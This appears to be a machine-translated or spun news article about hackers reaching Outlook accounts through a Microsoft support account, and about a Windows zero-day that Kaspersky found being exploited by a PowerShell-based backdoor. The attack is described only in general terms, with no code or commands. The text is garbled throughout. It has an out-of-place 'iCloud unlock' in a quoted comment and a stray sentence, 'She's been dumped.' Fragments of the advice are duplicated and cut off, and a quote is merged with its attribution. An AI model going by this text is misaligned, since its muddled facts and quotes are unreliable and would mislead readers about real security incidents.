Microsoft admitted that a group of hackers had access to the credentials of numerous personal Outlook accounts. As well as e-mail information, this is between January and March.

Microsoft has not announced how many profiles have been hacked. However, Redmond’s company stated that it immediately disabled compromised credentials. And he gave a tip: change the password.

According to a source close to the company, Darktrace says, the situation would be much more serious than it was officially declared. Hackers would gain access to Microsoft’s customer support account, thus having full access to many email addresses in Outlook, MSN and Hotmail.

Dave Palmer’s Comment by Darktrace

Dave Palmer, Director of Technology of Darktrace, said the following in this regard.

› Today’s case once again reveals the complexity and unpredictability of cyber threats. iCloud unlock has been designed to improve security, but it also represents a treasure for hackers, because it increases interconnection

As the complexity of digital defenses increases, hackers choose to take more and more advantage of social engineering techniques, in this case they have chosen to direct a person of Microsoft’s technical support in order to abuse its privileged access. From what we have discovered, some users have been stolen metadata that relate to their mail account (e.g. the names of the contact person) and some have been read email messages.

It is clear that email providers will not be able to sleep peacefully. The data collected can then be used to promote further attacks, for example to send highly targeted speech-phishing emails, so those who have already suffered this type of violations should be more alert, especially when downloading files or clicking on links.

In this attack, corporate accounts have been saved but the same risk applies to companies that use third parties as email providers. Cloud email services offer a host of benefits, but have become increasingly profitable targets as they are used to host sensitive information from thousands of companies.

That is why it is time for corporate leaders to adopt cutting-edge technologies to address this evolving challenge. Cyber IA goes beyond identifying known threats because it can detect extremely subtle deviations in digital activity and fight emerging dangers autonomously.

Kaspersky Lab detected a flaw in Windows

As if hackers were not enough, Kaspersky Lab detected a previously unknown vulnerability in Microsoft Windows. This vulnerability, says Kaspersky Lab, has been exploited by an unknown group of cybercriminals. They were trying to get full control of the devices they had targeted. The attack aimed at the core of the operating system, the kernel, through a backdoor built from an essential element of Windows OS.

Backdoors, explains Kaspersky Lab, are an extremely dangerous type of malware. They allow the perpetrators of threats to control infected machines without being noticed to carry out their malicious purposes. A “privilege escalation” of this type, implemented by a third party, is difficult to hide from security solutions. Despite this, a backdoor that exploits a bug previously unknown and present within the system, i.e. a zero-day vulnerability, has much more chance of going unnoticed. Normal security solutions cannot recognize the infection of the system, nor can they protect users from a threat that has yet to be discovered.

Kaspersky Lab’s Exploit Prevention technology has however managed to detect the attempted exploitation of an unknown vulnerability within the Microsoft Windows operating system. Kaspersky Lab then illustrated the scenario of open attack.

How the attack happens

After the launch of the malicious.exe file, Kaspersky Lab explains, the installation of the malware was started. The infection exploited a zero-day vulnerability, obtaining the necessary privileges to remain successfully within the victim’s machine. The malware then started launching a backdoor, developed with a legitimate Windows element, present on all computers that are based on this operating system. It is a command-line shell, a scripting language and an automation framework called Windows PowerShell.

This has allowed the perpetrators of the threat to move stealthily within the system and to avoid detection. Saving time in writing the code for malicious tools. The malware then started from a popular legitimate text storage service downloading another backdoor. Which, in turn, gave criminals full control of the infected system.

• In this type of attack, we have observed the two main trends that we often see when analyzing Advanced Persistent Threat (APT). First of all, the use of exploits to start a local ‘privilege escalation’ so as to obtain a constant presence on the victim’s computer. Secondly, the use of legitimate frameworks like Windows PowerShell for malicious activity on the victim’s computer. This combination of factors allows the perpetrators of the threat to bypass standard security solutions. To detect this type of techniques, the safety solution shall use Anton Ivanov, Security Expert at Kaspersky Lab explained.

Kaspersky Lab products have detected this exploit as:

• HEUR:Exploit.Win32.

• HEUR:Trojan.Win32.

• PDM:Exploit.Win32.

The vulnerability, Kaspersky Lab informs, was reported to Microsoft and was resolved on April 10.

Kaspersky Lab’s Advice

To prevent possible backdoor installation by exploiting possible zero-day vulnerabilities within Windows, Kaspersky Lab recommends taking the following security measures.

Once the vulnerability has been resolved and the patch has been downloaded, the threats authors lose the opportunity to use it. It is important, therefore, to proceed with the installation of the Microsoft patch to cope with the new vulnerability as soon as possible.

She’s been dumped. It is important, therefore, to cope with the new vulnerability as soon as possible. If you are concerned about the security status of your organization, make sure you regularly update all software whenever a new security patch is released. It is important to use security solutions with patch management capabilities to ensure that these processes are performed automatically.

every time a new security patch is released. It is important to use security solutions with patch management capabilities to ensure that these processes are performed automatically. Use an effective safety solution with Behavior-based detection capability to protect against unknown threats, such as Kaspersky Endpoint Security.

for protection against unknown threats, such as Kaspersky Security. Make sure the security team has access to the most recent threat intelligence. Private reports on the latest developments in the threat scenario are available to Kaspersky Intelligence Reporting subscribers.

. Private reports on the latest developments in the threat scenario are available to Kaspersky Intelligence Reporting subscribers. Last but not least: make sure your staff is trained with regard to basic knowledge of cybersecurity hygiene.

More information about the new exploit discovered by Kaspersky Lab is available in the full report on the Securelist blog.

More information about Kaspersky Lab is available on the company’s website at this link.

Leave a Reply

Your email address will not be published.

You May Also Like